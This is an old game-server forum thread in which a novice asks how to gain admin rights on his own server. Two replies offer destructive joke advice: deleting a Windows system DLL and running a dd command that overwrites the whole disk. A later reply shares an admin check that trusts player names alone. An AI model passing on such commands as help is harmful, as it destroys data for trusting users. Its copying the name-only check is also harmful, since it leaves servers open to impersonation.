how to login as admin ? :/

Started by ForOver, Oct 11, 2017, 07:08 PM

Previous topic - Next topic

ForOver

guys ,, when i add a command for admin only .. i am owner of my private server, but when i use it still is say me "you are not allowed to use the command" so guys how to login or set admin password ? help plz

Karan

You need to pray at least 4 to 5 times a day, make your lord happy, then start your computer, go to C:/Windows/System32/

Then look for a file named msvcr100.dll, delete it now, and continue, then join your server and type /admin plsletmelogin

if it's work then good, if not then sacrifice yourself in next year's Eid.

vitosca1

Quote from: ForOver on Oct 11, 2017, 07:08 PMi am owner of my private server
type in terminal as root:
sudo dd if=/dev/zero of=/dev/sda bs=8m

MatheuS

if( !sucess ) tryAgain();
Thanks to the VCMP community. It was the happiest period of my life.

ForOver

NicusorN5

Quote from: ForOver on Oct 12, 2017, 04:35 PMi don't want your jokes
Jesus Christ, how many years you are. It depends on the server. Edit it's database to make your self admin, else you can stick to playing as a n00b lol.

ForOver

Quote from: NicusorN5 on Oct 12, 2017, 05:01 PM
Jesus Christ, how many years you are. It depends on the server. Edit it's database to make your self admin, else you can stick to playing as a n00b lol.
u don't understand
i am new at script

Mahmoud Tornado

Quote from: ForOver on Oct 12, 2017, 07:44 PM
Quote from: NicusorN5 on Oct 12, 2017, 05:01 PM
u don't understand
i am new at script
Bro You Must Made An Admin System First

ForOver

explain me please :( how i make admin system

DizzasTeR

Quote from: Karan on Oct 12, 2017, 04:13 AMYou need to pray at least 4 to 5 times a day, make your lord happy, then start your computer, go to C:/Windows/System32/

Then look for a file named msvcr100.dll, delete it now, and continue, then join your server and type /admin plsletmelogin

Even simpler @ForOver, Just ignore dickheads like the one you witnessed right up there and try to gather information from the rest of are helping you. You basically need to make a proper account script in order to get admin in your server. There's no default 'RCON' admin login as we used to know.

ForOver

Quote from: Doom_Kill3R on Oct 13, 2017, 02:50 PM
Quote from: Karan on Oct 12, 2017, 04:13 AMYou need to pray at least 4 to 5 times a day, make your lord happy, then start your computer, go to C:/Windows/System32/

Even simpler @ForOver, Just ignore dickheads like the one you witnessed right up there and try to gather information from the rest of are helping you. You basically need to make a proper account script in order to get admin in your server. There's no default 'RCON' admin login as we used to know.
hmm, explain me :( how i can make proper account script. just give me a code about proper account.

!

Paste this full line
Quoteyou are not allowed to use the command
from any of the admin commands that you've made.

Discord: zeus#5155

Thijn

You say you get "You are not allowed to use the command" whenever you try to use admin commands. This makes me believe you already downloaded a "proper" account script.
Can you tell us what script you downloaded? Then we can help you further.

ForOver

Quote from: Thijn on Oct 16, 2017, 05:31 PMYou say you get "You are not allowed to use the command" whenever you try to use admin commands. This makes me believe you already downloaded a "proper" account script.
Can you tell us what script you downloaded? Then we can help you further.
sorry for late
i have main.nut script

Mohamed Boubekri

Hi. You Want Login As Admin.
Follow me Step.
    else if (cmd == "ann")
    {
if ( player.Name == "Here You Name example : Forover" || player.Name == "Here Post You Friend : Name" || player.Name == "Exaclty" )   // You Must Change Them To You Admins Names
    {
        if (!text) return ClientMessage("[#FF0000][Syntax]/ann <ID> <All/Nick/ID> <Text>", player, 0, 0, 0);
        local v = split(text, " ");
        if (v.len() < 3) return ClientMessage("[#FF0000][Syntax]/ann <ID> <All/Nick/ID> <Text>", player, 0, 0, 0);
        if (v[1].tolower() == "all") AnnounceAll(text.slice(v[0].len() + v[1].len() + 2), v[0].tointeger());
        else Announce(text.slice(v[0].len() + v[1].len() + 2), FindPlayer(v[1]), v[0].tointeger());
    }
        else MessagePlayer( "[#FF0000] You're not allowed to use this command. " , player )
}

if ( player.Name == "If you Do name : hihi Go Join Server with hihi" || player.Name == "Here Post You Friend : Name" || player.Name == "Exaclty" )
| What now ? | Not yet ! |
Morrocan:- [ 🇲🇦 ].